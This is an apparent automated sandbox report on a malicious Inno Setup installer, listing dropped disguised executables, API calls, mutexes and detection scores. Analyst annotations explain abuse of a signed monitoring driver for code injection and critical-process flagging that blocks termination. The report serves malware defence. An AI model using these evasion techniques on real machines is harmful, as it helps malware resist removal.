Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; ReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbc; ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbc; ReversingLabs: Detection: 26%
(The .vbc files are PE executables despite the extension, which is what the "Drops files with a non-matching file extension" signature refers to; their section table is listed under System Summary below.)
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe; Virustotal: Detection: 11%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 93.5% probability
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000C.00000003.1852873352.0000000000E40000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1852683211.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
(The PDB path belongs to tProtect.dll, the file registered as the CleverSoar kernel service in the process tree. objfre_wnet_amd64 is a WDK free (release) build for 64-bit Windows, and the tfsysmon directory under a "threat~1.26" tree is consistent with the TfSysMon system-monitor driver from the ThreatFire product; the dropped file appears to be that driver binary renamed to a .dll extension. This is the basis of the "Found driver which could be used to inject code into processes" signature: a driver that is legitimately signed loads under driver signature enforcement, and its IOCTL interface is then driven from user mode by the installer's DLL.)
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp; Code function: 6_2_6CC2E090 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_006D6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_006D7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; Strings found in binary or memory. All of these are DigiCert AIA, CRL, OCSP and CPS URLs from an embedded Authenticode certificate chain, not command-and-control addresses; the stray characters after each URL are the adjacent DER bytes that the string scanner picked up:
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr; String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr; String found in binary or memory: https://www.remobjects.com/ps
(These are Inno Setup and RemObjects PascalScript strings: the dropper is an Inno Setup installer, which also accounts for the is-XXXXX.tmp staging directories, the second-stage .tmp launched with /SL5=, and the /VERYSILENT switch in the process tree. The installer's [Run] or [Code] section, not a separate loader, is what spawns the powershell, 7zr and sc commands.)

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp; Process information set: 01 00 00 00
(This is the "Protects its processes via BreakOnTermination flag" signature: the value is the little-endian DWORD 1 written through the ProcessBreakOnTermination information class, which marks the process as critical, so terminating it from Task Manager, an EDR or a responder's script bugchecks the machine with CRITICAL_PROCESS_DIED. Setting or clearing the flag needs SeDebugPrivilege, which the "Enables debug privileges" signature reflects. On a live host, clear the flag (same information class, value 0) before killing the process, or let it exit on its own.)

System Summary

Source: update.vbc.1.dr | Static PE information: section name: .aQ#
Source: update.vbc.6.dr | Static PE information: section name: .aQ#
Source: hrsw.vbc.6.dr | Static PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6CAB3886
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC38810 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle, | 6_2_6CC38810
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC39450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, | 6_2_6CC39450
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6CAB3C62
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6CAB3D18
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6CAB3D62
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6CAB39CF
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6CAB3A6A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB1950: CreateFileA,DeviceIoControl,CloseHandle, | 6_2_6CAB1950
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor, | 6_2_6CAB4754
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CAB4754 | 6_2_6CAB4754
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CE18D12 | 6_2_6CE18D12
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CD84F0A | 6_2_6CD84F0A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CDA3881 | 6_2_6CDA3881
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CE0B06F | 6_2_6CE0B06F
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC34860 | 6_2_6CC34860
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC3A133 | 6_2_6CC3A133
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CD47A46 | 6_2_6CD47A46
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CDBCB30 | 6_2_6CDBCB30
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC99CE0 | 6_2_6CC99CE0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCE6D50 | 6_2_6CCE6D50
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC85EC9 | 6_2_6CC85EC9
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCECE80 | 6_2_6CCECE80
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC6BEA1 | 6_2_6CC6BEA1
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCE1810 | 6_2_6CCE1810
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCEC9F0 | 6_2_6CCEC9F0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC6B972 | 6_2_6CC6B972
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCFD930 | 6_2_6CCFD930
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCE0AD0 | 6_2_6CCE0AD0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCE4AA0 | 6_2_6CCE4AA0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCF7AA0 | 6_2_6CCF7AA0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCE2A50 | 6_2_6CCE2A50
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC73BCA | 6_2_6CC73BCA
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC83B66 | 6_2_6CC83B66
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC8840A | 6_2_6CC8840A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCF25C0 | 6_2_6CCF25C0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCE5580 | 6_2_6CCE5580
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCEC6E0 | 6_2_6CCEC6E0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC6F7CF | 6_2_6CC6F7CF
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CD0C700 | 6_2_6CD0C700
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCE3020 | 6_2_6CCE3020
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CCF6750 | 6_2_6CCF6750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007181EC | 10_2_007181EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006EE00A | 10_2_006EE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007581C0 | 10_2_007581C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00768240 | 10_2_00768240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007522E0 | 10_2_007522E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00772300 | 10_2_00772300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076C3C0 | 10_2_0076C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007604C8 | 10_2_007604C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0073E49F | 10_2_0073E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007525F0 | 10_2_007525F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00748650 | 10_2_00748650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007466D0 | 10_2_007466D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0074A6A0 | 10_2_0074A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0074C950 | 10_2_0074C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00720943 | 10_2_00720943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076E990 | 10_2_0076E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00752A80 | 10_2_00752A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0072AB11 | 10_2_0072AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00748C20 | 10_2_00748C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00756CE0 | 10_2_00756CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00760E00 | 10_2_00760E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00764EA0 | 10_2_00764EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007310AC | 10_2_007310AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0075D089 | 10_2_0075D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0073B121 | 10_2_0073B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00761120 | 10_2_00761120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0074D1D0 | 10_2_0074D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007691C0 | 10_2_007691C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00755180 | 10_2_00755180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0074B180 | 10_2_0074B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00767200 | 10_2_00767200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076D2C0 | 10_2_0076D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007353F3 | 10_2_007353F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006FB3E4 | 10_2_006FB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006D53CF | 10_2_006D53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076F3C0 | 10_2_0076F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0075F3A0 | 10_2_0075F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076D470 | 10_2_0076D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0075F420 | 10_2_0075F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00747410 | 10_2_00747410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007654D0 | 10_2_007654D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0071D496 | 10_2_0071D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006D1572 | 10_2_006D1572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00761550 | 10_2_00761550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00763530 | 10_2_00763530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0077351A | 10_2_0077351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0074F500 | 10_2_0074F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076F599 | 10_2_0076F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00729652 | 10_2_00729652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00773601 | 10_2_00773601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0075D6A0 | 10_2_0075D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006E9766 | 10_2_006E9766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006D97CA | 10_2_006D97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007677C0 | 10_2_007677C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006FF8E0 | 10_2_006FF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0074F910 | 10_2_0074F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076D9E0 | 10_2_0076D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00757AF0 | 10_2_00757AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00723AEF | 10_2_00723AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006EBAC9 | 10_2_006EBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006D1AA1 | 10_2_006D1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00757C50 | 10_2_00757C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006EBC92 | 10_2_006EBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0074FDF0 | 10_2_0074FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00755E80 | 10_2_00755E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00755F80 | 10_2_00755F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: String function: 6CD09F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: String function: 6CC6C240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 006D1E40 appears 84 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 006D28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 0076FB10 appears 720 times
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002FFE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F38A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000000.1710884007.0000000000AC9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Binary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal96.evad.winEXE@131/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC39450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, | 6_2_6CC39450
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006D9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, | 10_2_006D9313
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006E3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 10_2_006E3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006D9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, | 10_2_006D9252
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Code function: 6_2_6CC38930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW, | 6_2_6CC38930
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File created: C:\Program Files (x86)\Windows NT\is-H97U1.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4048:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6376:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3704:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6340:120:WilError_03
